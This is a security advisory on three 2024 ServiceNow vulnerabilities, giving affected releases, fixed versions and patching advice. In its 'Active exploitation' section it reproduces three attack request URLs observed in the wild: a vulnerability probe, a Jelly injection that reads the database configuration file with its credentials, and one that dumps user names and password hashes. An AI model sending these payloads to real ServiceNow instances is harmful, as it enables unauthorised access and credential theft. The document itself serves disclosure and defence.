Active exploitation of the ServiceNow RCE
Background
ServiceNow provides a platform for corporate transformation. ServiceNow can be used for various purposes, including HR and employee administration, automated workflows, and knowledge bases. Because ServiceNow is often hosted in the cloud yet requires access to data from a company’s local network, a proxy server is frequently used to configure it. This proxy server is known as a “MID Server” and is located within a company’s internal network. Because the design of ServiceNow requires administrator access on a ServiceNow instance to execute commands on the MID Server, the consequences of an authentication bypass are usually severe.
On July 10, 2024, ServiceNow published several severe vulnerabilities in their platform, including CVE-2024-4879, CVE-2024-5178, and CVE-2024-5217. Assetnote, a cybersecurity firm, appropriately presented these vulnerabilities to ServiceNow in May 2024. ServiceNow responded by fixing the hosted instances in June 2024.
Assetnote’s investigation highlighted how the three vulnerabilities could be linked to provide unauthorized remote code execution on the ServiceNow MID server, which serves as a proxy for ServiceNow cloud instances. In a typical arrangement, ServiceNow MID is deployed behind the firewall and connects to ServiceNow cloud instances unidirectionally.
The most severe of these vulnerabilities are CVE-2024-4879 and CVE-2024-5217, which have critical CVSSv4 scores of 9.3 and 9.2, respectively. Unauthenticated remote attackers can use these vulnerabilities to execute arbitrary code within the Now Platform, potentially resulting in compromise, data theft, and disruption to business operations. The third vulnerability, CVE-2024-5178, has a CVSSv4 score of 6.9 and enables administrative users to obtain unauthorized access to sensitive data on the web application server. While not as severe as the previous two, this issue nevertheless increases the danger of data leakage and unauthorized access to sensitive information.
Details of the vulnerabilities:
- CVE-2024-4879:
CVE-2024-4879 is a Jelly template injection vulnerability in ServiceNow UI Macros affecting Vancouver and Washington DC releases and could allow an unauthenticated attacker to remotely execute code. This vulnerability has a CVSS 3.x Score 9.8 (Critical).
- CVE-2024-5217:
CVE-2024-5217 is an incomplete input validation vulnerability in GlideExpression Script affecting the Washington DC, Vancouver, and earlier releases that could allow an unauthenticated attacker to remotely execute code. This vulnerability has a CVSS 3.x Score 9.8 (Critical).
- CVE-2024-5178:
CVE-2024-5178 is an incomplete input validation vulnerability in the SecurelyAccess API that affects the Washington DC, Vancouver, and Utah releases that could allow an attacker with administrative privileges to gain unauthorized access to sensitive files on the web application server. This vulnerability has a CVSS 3.x Score 4.9 (Medium).
Affected products:
The list of affected products include Washington DC, Vancouver, and Utah Now Platform releases. The following updates have been released to address vulnerabilities in various versions of ServiceNow. It is recommended to apply these patches and hot fixes promptly to ensure the security and stability of your instances. Each patch and hot fix is designed to address specific vulnerabilities and improve the overall security and performance of the ServiceNow platform. Ensure that your instance is updated to the latest version relevant to your release to benefit from these improvements.
| Release | Fixed Version |
| Utah | Utah Patch 10 Hot Fix 3
Utah Patch 10a Hot Fix 2 Utah Patch 10b Hot Fix 1 |
| Vancouver | Vancouver Patch 6 Hot Fix 2
Vancouver Patch 7 Hot Fix 3b Vancouver Patch 8 Hot Fix 4 Vancouver Patch 9 Hot Fix 1 Vancouver Patch 10 |
| Washington | Washington DC Patch 1 Hot Fix 3b
Washington DC Patch 2 Hot Fix 2 Washington DC Patch 3 Hot Fix 2 Washington DC Patch 4 Washington DC Patch 5 |
Active exploitation:
On July 24th, Resecurity published a blog post detailing how their network sensors detected multiple ServiceNow exploitation attempts that followed a three-step approach. Each step made a single request that appeared to link these vulnerabilities together and was identical to the request described in Assetnote’s write-up.
The initial stage of these efforts consisted of the attackers sending a specially crafted request that allowed them to determine whether a particular ServiceNow instance was vulnerable. In these probing queries, the attackers added a specially constructed payload to ensure that the server’s response produced the intended results. If this request is successful, it will produce an error message with the value 1337 (668.5*2).
/login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20
xmlns:j=%22jelly%22%20xmlns:g=%
27glide%27%3E%3Cg:evaluate%3Egs.
addErrorMessage(668.5*2);%3C/g:
evaluate%3E%3C/j:jelly%3E%3C/style%3E
The second stage of exploitation involved sending a second request by injecting a different payload that checks for the database’s availability and contents. If successful, the vulnerable instance would return details about the database. This request, if successful, displays an error message displaying key database details, such as the database’s name, url, and the user and password.
/login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%
20xmlns:j=%22jelly:core%22%20xmlns:
g=%27glide%27%3E%3Cg:evaluate
%3Ez=new%20Packages.java.io.File(%22%22)
.getAbsolutePath();z=z.substring(0,z.lastIndexOf(%22/%22))
;u=new%20SecurelyAccess(z.concat(%22/co..nf
glide.db.properties%22)).getBufferedReader();
s=%22%22;while((q=u.readLine())!==null)
s=s.concat(q,%22%5Cn%22);gs.addErrorMessage(s)
;%3C/g:evaluate%3E%3C/j:j
The final stage, using the information obtained from the second stage, involved the attackers sending a third request by injecting a different payload, which shows an error message of the user lists and associated meta-data from compromised instances. However, according to Resecurity, in most cases, this data was hashed.
/login.do?jvar_page_title=<style><j:jelly xmlns:j=”jelly” xmlns:g=’glide’><
g:evaluate>gr=newGlideRecord(“sys_user”);gr.query();s=””;
while(gr.next())s=s.concat(gr.user_name,” : “,gr.user_password,”<br/>”);gs.addErrorMessage(s);</g:evaluate></j:jelly></style>
According to Resecurity’s investigation, the attackers were unable to crack most hashes due to the complexity of the hashing method; however, Resecurity’s blog post indicates that the released information could aid cyberespionage and reconnaissance activities.
It is projected that threat actors would progressively attack ServiceNow and other comparable systems. Threat actors have been spotted in chatter on several underground forums on the Dark Web, seeking hacked access to IT service desks, corporate portals, and other enterprise systems that generally give remote access to employees and contractors. These technologies could be utilized for pre-positioning, attack preparation, and reconnaissance.
Recommendation
We strongly advise upgrading to the most recent patched versions of the ServiceNow platform. Please see the official ServiceNow advisory for further details on the patched versions.
For further information, go to the advisories provided for each vulnerability:
- https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1645154
- https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1648312
- https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1648313
Please adhere to your organization’s patching and testing requirements to avoid any operational disruptions.
References
References:
- https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1645154
- https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1648312
- https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1648313
- https://www.assetnote.io/resources/research/chaining-three-bugs-to-access-all-your-servicenow-data
- https://www.resecurity.com/blog/article/cve-2024-4879-and-cve-2024-5217-servicenow-rce-exploitation-in-a-global-reconnaissance-campaign